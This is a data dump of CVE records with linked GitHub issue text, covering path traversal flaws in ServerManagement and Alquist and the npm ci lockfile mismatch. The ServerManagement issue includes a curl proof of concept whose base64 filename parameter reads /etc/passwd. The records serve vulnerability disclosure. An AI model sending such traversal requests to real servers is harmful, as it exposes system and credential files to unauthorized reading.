"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/cksgf/ServerManagement/issues/21"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/cksgf/ServerManagement/issues/21"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:servermanagement_project:servermanagement:2019-11-13:*:*:*:*:*:*:*",
"matchCriteriaId": "8A70C1D8-B86F-409F-B680-CF02D7EB239D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/cksgf/ServerManagement/issues/21 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"cksgf",
"ServerManagement"
] | A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).
This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.
## Root Cause Analysis
In this case, the path traversal vulnerability can be blamed on incorrect usage of the send_from_directory Flask call. The vulnerability occurs due to the code snippet shown below
https://github.com/cksgf/ServerManagement/blob/49491cc6f94980e6be7791d17be947c27071eb56/route/file.py#L82-L93
Here, since the `filename` parameter is attacker controlled, the effective directory and filename passed to the send_from_directory call can be controlled by the attacker leading to a path traversal attack.
## Proof of Concept
The bug can be verified using the proof of concept similar to the one shown below.
```
curl -i -s -k -X $'GET' \
-H $'Host: 0.0.0.0:9001' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'session=eyJwYXNzd29yZCI6IndlbnJ1aSIsInNlY2VjdExpc3QiOiJbXSIsInVzZXJuYW1lIjoiYWRtaW4ifQ.FC1IVA.B3HWw42zgF_CltmVq0wm0N64vYQ' \
$'http://0.0.0.0:9001/DownFile?filename=L2V0Yy9wYXNzd2Q='
```
## Remediation
This can be easily fixed my restricting the value of file and path parameters by a fixed whitelist of possible values.
## CVSS 3 Score
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
### This bug was found using *[CodeQL by Github](codeql.github.com/)* | [Security] Path Traversal Vulnerability found | https://api.github.com/repos/cksgf/ServerManagement/issues/21/comments | 1 | 2021-09-22T23:11:43Z | 2022-04-23T22:46:06Z | https://github.com/cksgf/ServerManagement/issues/21 | 1,004,852,086 | 21 | 2,786 |
CVE-2021-43616 | 2021-11-13T18:15:07.537 | The npm ci command in npm 7.x and 8.x through 8.1.3 proceeds with an installation even if dependency information in package-lock.json differs from package.json. This behavior is inconsistent with the documentation, and makes it easier for attackers to install malware that was supposed to have been blocked by an exact version match requirement in package-lock.json. NOTE: The npm team believes this is not a vulnerability. It would require someone to socially engineer package.json which has different dependencies than package-lock.json. That user would have to have file system or write access to change dependencies. The npm team states preventing malicious actors from socially engineering or gaining file system access is outside the scope of the npm CLI. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 6,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Vendor Advisory"
],
"url": "https://docs.npmjs.com/cli/v7/commands/npm-ci"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://docs.npmjs.com/cli/v8/commands/npm-ci"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/icatalina/CVE-2021-43616"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/npm/cli/commit/457e0ae61bbc55846f5af44afa4066921923490f"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/npm/cli/issues/2701"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/npm/cli/issues/2701#issuecomment-972900511"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/npm/cli/issues/2701#issuecomment-979054224"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXNVFKOF5ZYH5NIRWHKN6O6UBCHDV6FE/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://medium.com/cider-sec/this-time-we-were-lucky-85c0dcac94a0"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20211210-0002/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Vendor Advisory"
],
"url": "https://docs.npmjs.com/cli/v7/commands/npm-ci"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://docs.npmjs.com/cli/v8/commands/npm-ci"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/icatalina/CVE-2021-43616"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/npm/cli/commit/457e0ae61bbc55846f5af44afa4066921923490f"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/npm/cli/issues/2701"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/npm/cli/issues/2701#issuecomment-972900511"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/npm/cli/issues/2701#issuecomment-979054224"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXNVFKOF5ZYH5NIRWHKN6O6UBCHDV6FE/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://medium.com/cider-sec/this-time-we-were-lucky-85c0dcac94a0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20211210-0002/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F582C303-4B6A-4B12-9E0A-BEB12E1B93D1",
"versionEndExcluding": null,
"versionEndIncluding": "7.24.2",
"versionStartExcluding": null,
"versionStartIncluding": "7.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DF29872C-4C3F-4DD4-ABEB-64246074752A",
"versionEndExcluding": null,
"versionEndIncluding": "8.1.3",
"versionStartExcluding": null,
"versionStartIncluding": "8.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netapp:next_generation_application_programming_interface:-:*:*:*:*:*:*:*",
"matchCriteriaId": "444CE322-1245-4EEB-A5CA-9FCB011BF531",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"345"
] | 345 | https://github.com/npm/cli/issues/2701 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"npm",
"cli"
] | ### Current Behavior:
`npm ci` does not fail when `package.json` doesn't match `package-lock.json`
### Expected Behavior:
`npm ci` refuses to install when the lock file is invalid.
### Steps To Reproduce:
1. Manually bump a major version of a dependency in `package.json`
2. Run `npm ci`
3. It should fail but performs the whole installation
### npm@7
<img width="531" alt="image" src="https://user-images.githubusercontent.com/4542735/107903616-d4763f80-6f9d-11eb-8a64-345635eee6d3.png">
### npm@6
<img width="746" alt="image" src="https://user-images.githubusercontent.com/4542735/107903652-ece65a00-6f9d-11eb-9401-d78aa3fc596f.png">
### Environment:
- OS: Mac OS
- Node: 14.15.3
- npm: 7.5.4 | [BUG] `npm ci` succeeds when `package-lock.json` doesn't match `package.json` | https://api.github.com/repos/npm/cli/issues/2701/comments | 50 | 2021-02-15T03:57:16Z | 2022-04-25T00:08:00Z | https://github.com/npm/cli/issues/2701 | 808,144,219 | 2,701 | 2,787 |
CVE-2021-43616 | 2021-11-13T18:15:07.537 | The npm ci command in npm 7.x and 8.x through 8.1.3 proceeds with an installation even if dependency information in package-lock.json differs from package.json. This behavior is inconsistent with the documentation, and makes it easier for attackers to install malware that was supposed to have been blocked by an exact version match requirement in package-lock.json. NOTE: The npm team believes this is not a vulnerability. It would require someone to socially engineer package.json which has different dependencies than package-lock.json. That user would have to have file system or write access to change dependencies. The npm team states preventing malicious actors from socially engineering or gaining file system access is outside the scope of the npm CLI. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 6,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Vendor Advisory"
],
"url": "https://docs.npmjs.com/cli/v7/commands/npm-ci"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://docs.npmjs.com/cli/v8/commands/npm-ci"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/icatalina/CVE-2021-43616"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/npm/cli/commit/457e0ae61bbc55846f5af44afa4066921923490f"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/npm/cli/issues/2701"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/npm/cli/issues/2701#issuecomment-972900511"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/npm/cli/issues/2701#issuecomment-979054224"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXNVFKOF5ZYH5NIRWHKN6O6UBCHDV6FE/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://medium.com/cider-sec/this-time-we-were-lucky-85c0dcac94a0"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20211210-0002/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Vendor Advisory"
],
"url": "https://docs.npmjs.com/cli/v7/commands/npm-ci"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://docs.npmjs.com/cli/v8/commands/npm-ci"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/icatalina/CVE-2021-43616"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/npm/cli/commit/457e0ae61bbc55846f5af44afa4066921923490f"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/npm/cli/issues/2701"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/npm/cli/issues/2701#issuecomment-972900511"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/npm/cli/issues/2701#issuecomment-979054224"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXNVFKOF5ZYH5NIRWHKN6O6UBCHDV6FE/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://medium.com/cider-sec/this-time-we-were-lucky-85c0dcac94a0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20211210-0002/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F582C303-4B6A-4B12-9E0A-BEB12E1B93D1",
"versionEndExcluding": null,
"versionEndIncluding": "7.24.2",
"versionStartExcluding": null,
"versionStartIncluding": "7.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DF29872C-4C3F-4DD4-ABEB-64246074752A",
"versionEndExcluding": null,
"versionEndIncluding": "8.1.3",
"versionStartExcluding": null,
"versionStartIncluding": "8.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netapp:next_generation_application_programming_interface:-:*:*:*:*:*:*:*",
"matchCriteriaId": "444CE322-1245-4EEB-A5CA-9FCB011BF531",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"345"
] | 345 | https://github.com/npm/cli/issues/2701#issuecomment-972900511 | null | github.com | [
"npm",
"cli"
] | ### Current Behavior:
`npm ci` does not fail when `package.json` doesn't match `package-lock.json`
### Expected Behavior:
`npm ci` refuses to install when the lock file is invalid.
### Steps To Reproduce:
1. Manually bump a major version of a dependency in `package.json`
2. Run `npm ci`
3. It should fail but performs the whole installation
### npm@7
<img width="531" alt="image" src="https://user-images.githubusercontent.com/4542735/107903616-d4763f80-6f9d-11eb-8a64-345635eee6d3.png">
### npm@6
<img width="746" alt="image" src="https://user-images.githubusercontent.com/4542735/107903652-ece65a00-6f9d-11eb-9401-d78aa3fc596f.png">
### Environment:
- OS: Mac OS
- Node: 14.15.3
- npm: 7.5.4 | [BUG] `npm ci` succeeds when `package-lock.json` doesn't match `package.json` | https://api.github.com/repos/npm/cli/issues/2701/comments | 50 | 2021-02-15T03:57:16Z | 2022-04-25T00:08:00Z | https://github.com/npm/cli/issues/2701 | 808,144,219 | 2,701 | 2,788 |
CVE-2021-43616 | 2021-11-13T18:15:07.537 | The npm ci command in npm 7.x and 8.x through 8.1.3 proceeds with an installation even if dependency information in package-lock.json differs from package.json. This behavior is inconsistent with the documentation, and makes it easier for attackers to install malware that was supposed to have been blocked by an exact version match requirement in package-lock.json. NOTE: The npm team believes this is not a vulnerability. It would require someone to socially engineer package.json which has different dependencies than package-lock.json. That user would have to have file system or write access to change dependencies. The npm team states preventing malicious actors from socially engineering or gaining file system access is outside the scope of the npm CLI. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 6,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Vendor Advisory"
],
"url": "https://docs.npmjs.com/cli/v7/commands/npm-ci"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://docs.npmjs.com/cli/v8/commands/npm-ci"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/icatalina/CVE-2021-43616"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/npm/cli/commit/457e0ae61bbc55846f5af44afa4066921923490f"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/npm/cli/issues/2701"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/npm/cli/issues/2701#issuecomment-972900511"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/npm/cli/issues/2701#issuecomment-979054224"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXNVFKOF5ZYH5NIRWHKN6O6UBCHDV6FE/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://medium.com/cider-sec/this-time-we-were-lucky-85c0dcac94a0"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20211210-0002/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Vendor Advisory"
],
"url": "https://docs.npmjs.com/cli/v7/commands/npm-ci"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://docs.npmjs.com/cli/v8/commands/npm-ci"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/icatalina/CVE-2021-43616"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/npm/cli/commit/457e0ae61bbc55846f5af44afa4066921923490f"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/npm/cli/issues/2701"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/npm/cli/issues/2701#issuecomment-972900511"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/npm/cli/issues/2701#issuecomment-979054224"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXNVFKOF5ZYH5NIRWHKN6O6UBCHDV6FE/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://medium.com/cider-sec/this-time-we-were-lucky-85c0dcac94a0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20211210-0002/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F582C303-4B6A-4B12-9E0A-BEB12E1B93D1",
"versionEndExcluding": null,
"versionEndIncluding": "7.24.2",
"versionStartExcluding": null,
"versionStartIncluding": "7.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DF29872C-4C3F-4DD4-ABEB-64246074752A",
"versionEndExcluding": null,
"versionEndIncluding": "8.1.3",
"versionStartExcluding": null,
"versionStartIncluding": "8.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netapp:next_generation_application_programming_interface:-:*:*:*:*:*:*:*",
"matchCriteriaId": "444CE322-1245-4EEB-A5CA-9FCB011BF531",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"345"
] | 345 | https://github.com/npm/cli/issues/2701#issuecomment-979054224 | null | github.com | [
"npm",
"cli"
] | ### Current Behavior:
`npm ci` does not fail when `package.json` doesn't match `package-lock.json`
### Expected Behavior:
`npm ci` refuses to install when the lock file is invalid.
### Steps To Reproduce:
1. Manually bump a major version of a dependency in `package.json`
2. Run `npm ci`
3. It should fail but performs the whole installation
### npm@7
<img width="531" alt="image" src="https://user-images.githubusercontent.com/4542735/107903616-d4763f80-6f9d-11eb-8a64-345635eee6d3.png">
### npm@6
<img width="746" alt="image" src="https://user-images.githubusercontent.com/4542735/107903652-ece65a00-6f9d-11eb-9401-d78aa3fc596f.png">
### Environment:
- OS: Mac OS
- Node: 14.15.3
- npm: 7.5.4 | [BUG] `npm ci` succeeds when `package-lock.json` doesn't match `package.json` | https://api.github.com/repos/npm/cli/issues/2701/comments | 50 | 2021-02-15T03:57:16Z | 2022-04-25T00:08:00Z | https://github.com/npm/cli/issues/2701 | 808,144,219 | 2,701 | 2,789 |
CVE-2021-43495 | 2021-11-15T13:15:07.663 | AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/AlquistManager/alquist/issues/43"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/AlquistManager/alquist/issues/43"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:*",
"matchCriteriaId": "022CFA01-411F-40C5-80A2-7FED3557C578",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/AlquistManager/alquist/issues/43 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"AlquistManager",
"alquist"
] | A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).
